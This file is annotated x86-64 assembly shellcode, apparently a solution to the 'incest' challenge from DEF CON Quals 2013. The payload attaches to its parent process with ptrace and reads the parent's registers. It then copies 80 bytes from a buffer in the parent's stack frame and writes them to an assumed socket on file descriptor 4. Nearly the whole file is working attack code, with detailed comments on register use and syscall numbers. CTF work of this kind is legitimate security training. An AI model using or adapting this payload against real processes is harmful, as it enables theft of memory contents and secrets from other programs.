;
; Defcon Quals 2013 - incest
;
; ptrace parent shellcode for sis
; by timhsu@chroot.org, June 2013
BITS 64
GLOBAL _start
;
; Overview (what the code below does, in order):
;   1. getppid()                                  -> rbx = pid of the parent
;   2. ptrace(PTRACE_ATTACH, rbx, 0, ?)           ; attach to the parent
;   3. wait4(rbx, NULL, 0, NULL)                  ; wait for the attach-stop
;   4. ptrace(PTRACE_GETREGS, rbx, 0, buffer)     ; parent's registers -> buffer
;   5. ptrace(PTRACE_PEEKDATA, rbx, rbp-0x18, buffer) ; read one pointer out of the parent's frame
;   6. 10 x ptrace(PTRACE_PEEKDATA, rbx, ptr+8*i, buffer+8*i) ; copy 80 bytes from that pointer
;   7. write(4, buffer, 80); exit()
;
; Register roles (values are live across labels, so instruction order matters):
;   rbx = parent pid, set once after getppid; syscall does not touch rbx, so it
;         is reused as the pid argument of every ptrace/wait4 below
;   r10 = ptrace "data" argument = write cursor into buffer
;   rdx = ptrace "addr" argument = address inside the parent being read
;   rcx = counter for the 10-iteration PEEKDATA loop; syscall clobbers rcx and
;         r11, so ptrace_peektext saves/restores rcx around its syscall
; Stack after `run`: [ptr][buffer] -- two copies of the buffer address; the top
; one is peeked (pop/push) at try_getregs, both are popped at dump.
;
; Linux x86-64 raw syscall ABI: nr in rax; args in rdi, rsi, rdx, r10, r8, r9.
; No syscall return value is checked anywhere: a refused attach or a failed
; getregs/peek just means the bytes written out are garbage.
;
_start:
jmp get_buf ; jmp/call/pop trick: get_buf does `call run`, which pushes the address of `buffer`
run:
pop rsi ; rsi = address of buffer (the return address pushed by `call run`)
push rsi ; save buffer address
push rsi ; ptr = buffer (read back into r10 at try_getregs without popping)
xor rax, rax ; zero the registers
xor rdi, rdi
xor rdx, rdx
xor rbx, rbx
; sys_getppid()  (NR 110 on x86-64)
add rax, 110
syscall
mov rsi, rax ; rsi = ppid; also serves as the pid argument of PTRACE_ATTACH below
push rsi
pop rbx ; save ppid to rbx
try_attach:
; sys_ptrace(request, pid, addr, data);  NR 101
; rdi , rsi, rdx, r10
; rsi still holds ppid here; addr (rdx) = 0; data (r10) is never set --
; presumably fine because ATTACH ignores addr/data.
xor rax, rax
add rax, 101
xor rdx, rdx
; PTRACE_ATTACH 16
xor rdi, rdi
add rdi, 16
syscall
; NOTE(review): rax is not checked. Attaching to the parent is subject to the
; kernel's ptrace access policy (e.g. Yama ptrace_scope); if the attach is
; refused, everything below runs against an untraced process.
; wait4(pid, status, opt, rusage)  NR 61
; rdi rsi rdx, r10
; Blocks until the tracee reports its stop; status and rusage are NULL.
try_wait:
xor rax, rax
; NR_wait4 = 61
add rax, 61
mov rdi, rbx
xor rsi, rsi
xor rdx, rdx
xor r10, r10
syscall
try_getregs:
mov rsi, rbx ; get ppid
xor rax, rax
add rax, 101
xor rdx, rdx
;
; PTRACE_GETREGS (rdi, rsi, rdx, r10);
; The kernel fills a struct user_regs_struct at r10 (= buffer). That struct is
; 27 qwords on x86-64 -- far more than the 10 bytes declared at `buffer`, so
; the write runs past it into whatever follows the shellcode in memory.
mov rdi, 12
pop r10 ; peek the saved ptr off the stack without consuming it
push r10
syscall
mov rdx, [r10+4*8] ; get rbp of parent(ppid): user_regs_struct order is r15,r14,r13,r12,rbp,... so index 4 = rbp
try_peektext:
sub rdx, 0x18 ; from disasm sis,
; get buffer address of parent
; (rdx = rbp-0x18: a slot in the parent's stack frame which, per the author's
; disassembly of the target binary, holds the pointer to the parent's buffer)
do_peektext:
mov rsi, rbx ; get ppid
call ptrace_peektext ; raw PEEKDATA: the kernel stores the read qword at *r10 (= buffer)
mov rdx, [r10] ; rdx = address   (the pointer just read out of the parent)
mov rcx, 10 ; read 10 times  (10 qwords = 80 bytes)
again_peektext:
; PTRACE_PEEKTEXT again => loop for get more data
; (rcx survives each syscall only because ptrace_peektext pushes/pops it)
mov rsi, rbx
call ptrace_peektext
add r10, 8 ; ptr+=8
add rdx, 8 ; address+=8
loop again_peektext ; dec rcx / jnz; iteration 1 overwrites the pointer stored at buffer[0..8]
dump:
pop rsi ; ptr
pop rsi ; buffer, to dump  (both stack slots hold the same address)
; sys_write(fd, buffer, length)  NR 1
xor rax, rax
xor rdx, rdx
add rax, 1 ; sys_write
xor rdi, rdi
add rdi, 4 ; socket = 4  (fd 4, which the author assumes is the connection; not stdout)
add rdx, 80 ; string length (the 80 bytes filled by the PEEKDATA loop)
syscall
; sys_exit  (rdi still holds 4 from the write, so the exit status is 4)
xor rax, rax
add rax, 60 ; sys_exit
syscall
ptrace_peektext:
;-----------------------------------------------------------------------
; ptrace_peektext -- one raw ptrace(PTRACE_PEEKDATA, pid, addr, data) call
; In:    rsi = pid, rdx = addr in the tracee, r10 = where the kernel stores the word
; Out:   rax = syscall result (no caller checks it); *r10 = the qword read
; Clobb: rax, rdi, r11, flags. rcx is preserved (push/pop) because the caller
;        uses it as a `loop` counter and syscall clobbers rcx.
; Note:  despite the label, the request is PTRACE_PEEKDATA (2), not PEEKTEXT (1).
;-----------------------------------------------------------------------
; ptrace(rdi, rsi, rdx, r10);
; PTRACE_PEEKDATA 0x2
push rcx
xor rax, rax ; redundant: both registers are overwritten by the mov's below
xor rdi, rdi
mov rax, 101
mov rdi, 2
syscall
pop rcx
ret
get_buf:
; `call run` pushes the address of the next instruction -- i.e. `buffer` -- so
; that `run` can pop it: the usual way to obtain a data address in
; position-independent shellcode without a RIP-relative lea.
call run ; put address of buffer onto the stack
buffer:
; 10 placeholder bytes. This is really only the start of a scratch area:
; PTRACE_GETREGS writes a whole user_regs_struct here and the PEEKDATA loop
; writes 80 bytes, both extending past the end of the shellcode.
db 'AAAAAAAAAA'